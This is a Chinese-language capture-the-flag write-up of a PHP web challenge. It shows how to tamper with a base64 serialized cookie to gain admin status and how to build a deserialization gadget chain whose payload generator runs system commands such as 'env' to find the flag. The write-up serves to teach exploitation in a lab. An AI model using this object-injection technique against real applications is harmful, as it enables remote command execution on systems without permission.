[HZNUCTF 2023 preliminary]ppppop

打开题目便是空白页面，查看源代码，也是空白的，没有任何内容，进行目录扫描发现

有目录，但是内容都是为0

进行抓包，发现cookie中user的值有点像base64编码

尝试进行解码

解码内容是O:4:"User":1:{s:7:"isAdmin";b:0;}，

其中b:0：表示一个布尔类型的值，0代表着false为假，1代表着true

也就是讲User对象的isAdmin属性当前为false，就是表示这个用户不是管理员，那就将0改为1，

和原本的user值换一下发包

就返回反序列化代码

<?php error_reporting(0); include('utils.php'); //包含utils.php文件 class A { //定义一个A类，类中有三个公共属性 public $className; public $funcName; public $args; public function __destruct() { //当对象销毁时触发 $class = new $this->className; //将className进行实例化。让这样就可以将className的值为B，就相当于new B了 $funcName = $this->funcName; //funcName属性的值赋值给funcName，这是方法名 $class->$funcName($this->args); //args属性值是参数 } } class B { public function __call($func, $arg) { //当调用不存在的方法时触发，$func是方法名，$arg是参数 $func($arg[0]); //这就是函数回调（function call）！如果 $func = "system"，$arg[0] = "id"，那么就会执行 system("id")！ } } if(checkUser()) { highlight_file(__FILE__); $payload = strrev(base64_decode($_POST['payload'])); //将post传的参数值进行base64加密然后进行字符串反转 unserialize($payload); //这样我们可以将serialize结果先进行字符串反转，然后进行base64编码 }

这题比较简单，就是将className等于B类，这样就相当于实例了B类并赋值给了class，class调用$funcName($this->args)就是调用funcName()方法，这个方法在B类中是不存在的，所以就触发了__call方法，触发__call方法传入的两个变量$func, $arg它们分别是funcName属性的值和args的值，触发了__call方法，就会调动$func($arg[0]);这是函数回调，如果 $func = "system"，$arg[0] = "id"，那么就会执行 system("id")！

所以payload：

<?php class A { public $className; public $funcName; public $args; public function __destruct() { $class = new $this->className; $funcName = $this->funcName; $class->$funcName($this->args); } } class B { public function __call($func, $arg) { $func($arg[0]); } } $a=new A(); $a->className="B"; $a->funcName="system"; $a->args="env"; echo base64_encode(strrev(serialize($a)));

ls和ls /都没有发现flag文件，所以看看env中有没有flag

NSSCTF{417cea44-7104-4dee-8235-af0ee3d15ebb}

本题的知识点

其中b:0：表示一个布尔类型的值，0代表着false为假，1代表着true

$func($arg[0]); ：这是函数回调！如果 $func = "system"，$arg[0] = "id"，那么就会执行 system("id")！

strrev函数是将字符串内容反转，就是将字符串中的字符顺序颠倒过来